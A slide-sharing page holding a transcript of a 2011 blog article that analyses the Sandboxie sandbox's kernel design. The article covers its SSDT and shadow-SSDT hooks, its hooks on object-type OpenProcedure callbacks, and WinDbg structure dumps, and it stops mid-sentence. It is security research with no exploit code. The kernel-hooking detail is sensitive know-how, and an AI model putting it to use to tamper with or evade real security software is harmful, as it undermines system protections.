Stop Monkeys FallStop Monkeys Fall
Stop Monkeys Fall
 
The Ring programming language version 1.2 book - Part 51 of 84
The Ring programming language version 1.2 book - Part 51 of 84The Ring programming language version 1.2 book - Part 51 of 84
The Ring programming language version 1.2 book - Part 51 of 84
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
 
20101017 program analysis_for_security_livshits_lecture04_nozzle
20101017 program analysis_for_security_livshits_lecture04_nozzle20101017 program analysis_for_security_livshits_lecture04_nozzle
20101017 program analysis_for_security_livshits_lecture04_nozzle
 
Real world cross-platform testing
Real world cross-platform testingReal world cross-platform testing
Real world cross-platform testing
 
A Life of breakpoint
A Life of breakpointA Life of breakpoint
A Life of breakpoint
 
A topology of memory leaks on the JVM
A topology of memory leaks on the JVMA topology of memory leaks on the JVM
A topology of memory leaks on the JVM
 
The Ring programming language version 1.8 book - Part 91 of 202
The Ring programming language version 1.8 book - Part 91 of 202The Ring programming language version 1.8 book - Part 91 of 202
The Ring programming language version 1.8 book - Part 91 of 202
 

Similar to Sandboxie process isolation with kernel hooks

Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...
How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...
How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...Ritta Narita
 
How to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindAndreas Czakaj
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)Massimo Oliviero
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Rémi Jullian
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018
Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018
Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018Andy Davies
 
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...Andrey Karpov
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsPVS-Studio
 
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)Alexandre Borges
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security ClassRich Helton
 
Tornado Web Server Internals
Tornado Web Server InternalsTornado Web Server Internals
Tornado Web Server InternalsPraveen Gollakota
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 
The Ring programming language version 1.10 book - Part 83 of 212
The Ring programming language version 1.10 book - Part 83 of 212The Ring programming language version 1.10 book - Part 83 of 212
The Ring programming language version 1.10 book - Part 83 of 212Mahmoud Samir Fayed
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Tzung-Bi Shih
 

Similar to Sandboxie process isolation with kernel hooks (20)

Book
BookBook
Book
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...
How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...
How to create multiprocess server on windows with ruby - rubykaigi2016 Ritta ...
 
How to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mind
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)Advanced iOS Debbuging (Reloaded)
Advanced iOS Debbuging (Reloaded)
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018
Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018
Inspecting iOS App Traffic with JavaScript - JSOxford - Jan 2018
 
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source Components
 
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
Tornado Web Server Internals
Tornado Web Server InternalsTornado Web Server Internals
Tornado Web Server Internals
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
 
The Ring programming language version 1.10 book - Part 83 of 212
The Ring programming language version 1.10 book - Part 83 of 212The Ring programming language version 1.10 book - Part 83 of 212
The Ring programming language version 1.10 book - Part 83 of 212
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
 

More from KarlFrank99

Double agent zero-day code injection and persistence technique
Double agent zero-day code injection and persistence techniqueDouble agent zero-day code injection and persistence technique
Double agent zero-day code injection and persistence techniqueKarlFrank99
 
Process Doppelgänging
Process Doppelgänging Process Doppelgänging
Process Doppelgänging KarlFrank99
 
Osteoblast-Osteoclast Interactions
Osteoblast-Osteoclast InteractionsOsteoblast-Osteoclast Interactions
Osteoblast-Osteoclast InteractionsKarlFrank99
 
Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...
Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...
Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...KarlFrank99
 
Osteoblast and Osteoclast Crosstalks: From OAF to Ephrin
Osteoblast and Osteoclast Crosstalks: From OAF to EphrinOsteoblast and Osteoclast Crosstalks: From OAF to Ephrin
Osteoblast and Osteoclast Crosstalks: From OAF to EphrinKarlFrank99
 
The Tight Relationship Between Osteoclasts and the Immune System
The Tight Relationship Between Osteoclasts and the Immune SystemThe Tight Relationship Between Osteoclasts and the Immune System
The Tight Relationship Between Osteoclasts and the Immune SystemKarlFrank99
 
No association between circulating concentrations of vitamin D and risk of lu...
No association between circulating concentrations of vitamin D and risk of lu...No association between circulating concentrations of vitamin D and risk of lu...
No association between circulating concentrations of vitamin D and risk of lu...KarlFrank99
 
20180426_EcbMeeting_DiffStatement
20180426_EcbMeeting_DiffStatement20180426_EcbMeeting_DiffStatement
20180426_EcbMeeting_DiffStatementKarlFrank99
 
20180420__DanskeResearch_ECBPreview
20180420__DanskeResearch_ECBPreview20180420__DanskeResearch_ECBPreview
20180420__DanskeResearch_ECBPreviewKarlFrank99
 
20180420__DanskeResearcch_WeeklyFocus
20180420__DanskeResearcch_WeeklyFocus20180420__DanskeResearcch_WeeklyFocus
20180420__DanskeResearcch_WeeklyFocusKarlFrank99
 
20180417_DanskeResearch_FX_Forecast_Update
20180417_DanskeResearch_FX_Forecast_Update20180417_DanskeResearch_FX_Forecast_Update
20180417_DanskeResearch_FX_Forecast_UpdateKarlFrank99
 
20180418_NordeaResearch_EAInfl_n_ECB
20180418_NordeaResearch_EAInfl_n_ECB20180418_NordeaResearch_EAInfl_n_ECB
20180418_NordeaResearch_EAInfl_n_ECBKarlFrank99
 
NordeaResearch_EcbWatch_20180423
NordeaResearch_EcbWatch_20180423NordeaResearch_EcbWatch_20180423
NordeaResearch_EcbWatch_20180423KarlFrank99
 
20170426_CommerzbankResearch__BullionWeeklyTechnicals
20170426_CommerzbankResearch__BullionWeeklyTechnicals20170426_CommerzbankResearch__BullionWeeklyTechnicals
20170426_CommerzbankResearch__BullionWeeklyTechnicalsKarlFrank99
 
Hs P005 Reflective Dll Injection
Hs P005 Reflective Dll InjectionHs P005 Reflective Dll Injection
Hs P005 Reflective Dll InjectionKarlFrank99
 
Atomic Bomb Tutorial En
Atomic Bomb Tutorial EnAtomic Bomb Tutorial En
Atomic Bomb Tutorial EnKarlFrank99
 
Bh Usa 07 Butler And Kendall
Bh Usa 07 Butler And KendallBh Usa 07 Butler And Kendall
Bh Usa 07 Butler And KendallKarlFrank99
 

More from KarlFrank99 (20)

Comodo q1 2018
Comodo q1 2018Comodo q1 2018
Comodo q1 2018
 
Double agent zero-day code injection and persistence technique
Double agent zero-day code injection and persistence techniqueDouble agent zero-day code injection and persistence technique
Double agent zero-day code injection and persistence technique
 
Process Doppelgänging
Process Doppelgänging Process Doppelgänging
Process Doppelgänging
 
Osteoblast-Osteoclast Interactions
Osteoblast-Osteoclast InteractionsOsteoblast-Osteoclast Interactions
Osteoblast-Osteoclast Interactions
 
Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...
Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...
Role of autophagy in tumor necrosis factor-α- induced apoptosis of osteoblast...
 
Osteoblast and Osteoclast Crosstalks: From OAF to Ephrin
Osteoblast and Osteoclast Crosstalks: From OAF to EphrinOsteoblast and Osteoclast Crosstalks: From OAF to Ephrin
Osteoblast and Osteoclast Crosstalks: From OAF to Ephrin
 
The Tight Relationship Between Osteoclasts and the Immune System
The Tight Relationship Between Osteoclasts and the Immune SystemThe Tight Relationship Between Osteoclasts and the Immune System
The Tight Relationship Between Osteoclasts and the Immune System
 
No association between circulating concentrations of vitamin D and risk of lu...
No association between circulating concentrations of vitamin D and risk of lu...No association between circulating concentrations of vitamin D and risk of lu...
No association between circulating concentrations of vitamin D and risk of lu...
 
20180426_EcbMeeting_DiffStatement
20180426_EcbMeeting_DiffStatement20180426_EcbMeeting_DiffStatement
20180426_EcbMeeting_DiffStatement
 
20180420__DanskeResearch_ECBPreview
20180420__DanskeResearch_ECBPreview20180420__DanskeResearch_ECBPreview
20180420__DanskeResearch_ECBPreview
 
20180420__DanskeResearcch_WeeklyFocus
20180420__DanskeResearcch_WeeklyFocus20180420__DanskeResearcch_WeeklyFocus
20180420__DanskeResearcch_WeeklyFocus
 
20180417_DanskeResearch_FX_Forecast_Update
20180417_DanskeResearch_FX_Forecast_Update20180417_DanskeResearch_FX_Forecast_Update
20180417_DanskeResearch_FX_Forecast_Update
 
20180418_NordeaResearch_EAInfl_n_ECB
20180418_NordeaResearch_EAInfl_n_ECB20180418_NordeaResearch_EAInfl_n_ECB
20180418_NordeaResearch_EAInfl_n_ECB
 
NordeaResearch_EcbWatch_20180423
NordeaResearch_EcbWatch_20180423NordeaResearch_EcbWatch_20180423
NordeaResearch_EcbWatch_20180423
 
20170426_CommerzbankResearch__BullionWeeklyTechnicals
20170426_CommerzbankResearch__BullionWeeklyTechnicals20170426_CommerzbankResearch__BullionWeeklyTechnicals
20170426_CommerzbankResearch__BullionWeeklyTechnicals
 
Dsohowto
DsohowtoDsohowto
Dsohowto
 
Tesi Laurea
Tesi LaureaTesi Laurea
Tesi Laurea
 
Hs P005 Reflective Dll Injection
Hs P005 Reflective Dll InjectionHs P005 Reflective Dll Injection
Hs P005 Reflective Dll Injection
 
Atomic Bomb Tutorial En
Atomic Bomb Tutorial EnAtomic Bomb Tutorial En
Atomic Bomb Tutorial En
 
Bh Usa 07 Butler And Kendall
Bh Usa 07 Butler And KendallBh Usa 07 Butler And Kendall
Bh Usa 07 Butler And Kendall
 

Recently uploaded

1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
mini mental status format.docx
mini mental status format.docxmini mental status format.docx
mini mental status format.docxPoojaSen20
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxpboyjonauth
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxGaneshChakor2
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...RKavithamani
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxRoyAbrique
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 

Recently uploaded (20)

1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Staff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSDStaff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSD
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
mini mental status format.docx
mini mental status format.docxmini mental status format.docx
mini mental status format.docx
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptx
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptx
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 

Sandboxie process isolation with kernel hooks

  • 1. Sandboxie. Process isolation with kernel hooks. May 23rd, 2011 Posted in Uncategorized Write comment 1. Introduction: Sandboxie is a sandbox that performs a process isolation. Its main features: -Access control to kernel resources by direct hooks on kernel objects. -Some ssdt and shadow ssdt hooks to control window messages. -Some kernel registered callbacks to be notified of process creating, images loaded, … In this article I will speak about sandoxie design and I will perform a analysis from a security point of view. 2. Sandboxie design: Sandboxie consists of a interface application, a service, … but we are interested in two components: SbieDrv.sys, the driver that hooks in kernel, and SbieDll.dll, the dll that is injected to the sandboxed processes.
  • 2. Sandboxie driver hooks in kernel to protect resources from sandboxed processes (it hooks kernel objects of type “Type”, ssdt, shadow ssdt). Driver will put a callback with PsLoadImageNotifyRoutine and PsCreateProcessNotifyRoutine to be notified when a image is loaded or a process is created. Sandboxie driver will have a list with all sandboxed processes that must control. If the parent of a created process is sandboxed, the new process will be linked in the list of sandboxed processes too. The resource access control is easy: if the process is sandboxed, access is denied, and i f the process is not sandboxed, access is granted. However Sandboxie lets some resources to the sandboxed processes. In addition it builds a “parallel” file system, registry, … for sandboxed processes. For this reason Sandboxie will export a lot of functionality with Io Controls for accesing files, registry, … in a secure way. So sandboxed processes must
  • 3. access system resources with Sandboxie driver Io Controls. Here it comes SbieDll. SbieDll will hook all exports for all dlls into the sandboxed processes. This dll is necessary to have the sandboxed processes working. When it hooks important apis such as ZwCrateFile, ZwCreateProcess, ZwOpenKey, …, the dll stop the normal execution flow to kernel for redirecting it to SbieDrv Io Controls (if you remove all SbieDll user mode hooks with HookShark for example, you can see that the process can’t access anything). 3. Resources access control: Sandboxie hooks some kernel objects found in ObjectTypes directory: token, process, thread, event, section, port and semaphore, of type “Type”. It hooks the function pointer OpenProcedure (OB_OPEN_METHOD type) to control the access to that type of objects: OBJECT_TYPE ->OBJECT_TYPE_INITIALIZER-> OpenProcedure Only with this it can to control file disk access, registry, … It must control window messages too (managed by win32k.sys). It must stop some messages from sandboxed processes, windows hooks, … To do that SbieDrv intercepts some ssdt and shadow ssdt apis: win32k_NtUserCallHwndParamLock win32k_NtUserDestroyWindow win32k_NtUserShowWindow win32k_NtUserSendInput win32k_NtUserBlockInput win32k_NtUserSystemParametersInfo win32k_NtUserSetSysColors win32k_NtUserSetSystemCursor win32k_NtUserMessageCall win32k_NtUserPostMessage win32k_NtUserPostThreadMessage win32k_NtUserSetWindowsHookEx win32k_NtUserSetWinEventHook nt_NtRequestPort nt_NtRequestWaitReplyPort nt_NtTraceEvent 3.1. ObjectTypes hooks: We are going to analyze objects under ObjectTypes and we will take Token object for this analysis with windbg: WINDBG>!object ObjectTypes Object: e1000548 Type: (819f1418) Directory ObjectHeader: e1000530 (oldversion) HandleCount: 0 PointerCount: 25 Directory Object: e1001520 Name: ObjectTypes Hash Address Type Name —- ——- —- —- 00 819f1418 Type Directory 01 819ccca0 Type Thread 819c95e0 Type Mutant
  • 4. 03 8198cca0 Type FilterCommunicationPort 05 819b8e70 Type Controller 07 819c8ca0 Type Profile 819c9980 Type Event 819f15e8 Type Type 09 819c8560 Type Section 819c97b0 Type EventPair 819f1248 Type SymbolicLink 10 819c8730 Type Desktop 11 819c8e70 Type Timer 12 819b8730 Type File 819c8900 Type WindowStation 16 819b8ad0 Type Driver 18 819eb910 Type WmiGuid 819c8ad0 Type KeyedEvent 19 819cc040 Type Token 819b8ca0 Type Device 20 819cc408 Type DebugObject 21 819b8900 Type IoCompletion 22 819cce70 Type Process 24 819f0300 Type Adapter 26 819c5980 Type Key 28 819ccad0 Type Job 31 819f0708 Type WaitablePort 819f08d8 Type Port 32 819c9410 Type Callback 33 8198ce70 Type FilterConnectionPort 34 819c8040 Type Semaphore WINDBG>!object 819cc040 Object: 819cc040 Type: (819f15e8) Type ObjectHeader: 819cc028 (oldversion) HandleCount: 0 PointerCount: 1 Directory Object: e1000548 Name: Token WINDBG>dt _OBJECT_TYPE819cc040 ntdll!_OBJECT_TYPE +0x000 Mutex : _ERESOURCE +0x038 TypeList : _LIST_ENTRY[ 0x819cc078 – 0x819cc078 ] +0x040 Name : _UNICODE_STRING“Token” +0x048 DefaultObject : 0x80558cc0 +0x04c Index : 4 +0x050 TotalNumberOfObjects : 0x1a +0x054 TotalNumberOfHandles : 0x10 +0x058 HighWaterNumberOfObjects : 0x1d +0x05c HighWaterNumberOfHandles : 0x14 +0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER +0x0ac Key : 0x656b6f54 +0x0b0 ObjectLocks : [4] _ERESOURCE Como vemos de ObjectTypes cuelgan varios objetos de tipo Type. La estructura de estos objetos es de tipo _OBJECT_TYPE. We are interested on OBJECT_TYPE structure and OBJECT_TYPE_INITIALIZER because into this sub-structure we find the pointer to OpenProcedure and other callbacks (open, close, delete, …). typedef struct _OBJECT_TYPE_INITIALIZER { USHORT Length; 2 bytes BOOLEAN UseDefaultObject; 1 byte BOOLEAN Reserved; 1 byte
  • 5. ULONGInvalidAttributes; 4 bytes GENERIC_MAPPINGGenericMapping; 16 bytes ULONGValidAccessMask; 4 bytes BOOLEAN SecurityRequired; 1 byte BOOLEAN MaintainHandleCount; 1 byte BOOLEAN MaintainTypeList; 1 byte POOL_TYPEPoolType; 1 byte ULONGObjectTypeCode; 4 bytes //-> this fielddepends on the OS version, it can //to be here or not so the offset of OpenProcedure //can to be +30h or +34h. ULONGDefaultPagedPoolCharge; 4 bytes ULONGDefaultNonPagedPoolCharge; 4 bytes //—— OB_DUMP_METHOD DumpProcedure; 4 bytes OB_OPEN_METHOD OpenProcedure; 4 bytes OB_CLOSE_METHOD CloseProcedure; 4 bytes OB_DELETE_METHOD DeleteProcedure; 4 bytes OB_PARSE_METHOD ParseProcedure; 4 bytes OB_SECURITY_METHOD SecurityProcedure; 4 bytes OB_QUERYNAME_METHOD QueryNameProcedure; 4 bytes OB_OKAYTOCLOSE_METHOD OkayToCloseProcedure; 4 bytes } OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER; The fieldObjectTypeCode only exists with some OS versions andbuilds. SbieDrvhas in mindthis fact. OpenProcedure pointer is OB_OPEN_METHOD: typedef NTSTATUS (NTAPI*OB_OPEN_METHOD)( IN OB_OPEN_REASON Reason, IN PEPROCESS Process OPTIONAL, IN PVOID ObjectBody, IN ACCESS_MASKGrantedAccess, IN ULONGHandleCount ); This callback is called when a object of that type (process, token, …) is opened. SbieDrv hooks the callback OpenProcedure for token, process, thread, event, section, port and semaphore Types. In the next capture we see SbieDrv calling the function that will perform the hook:
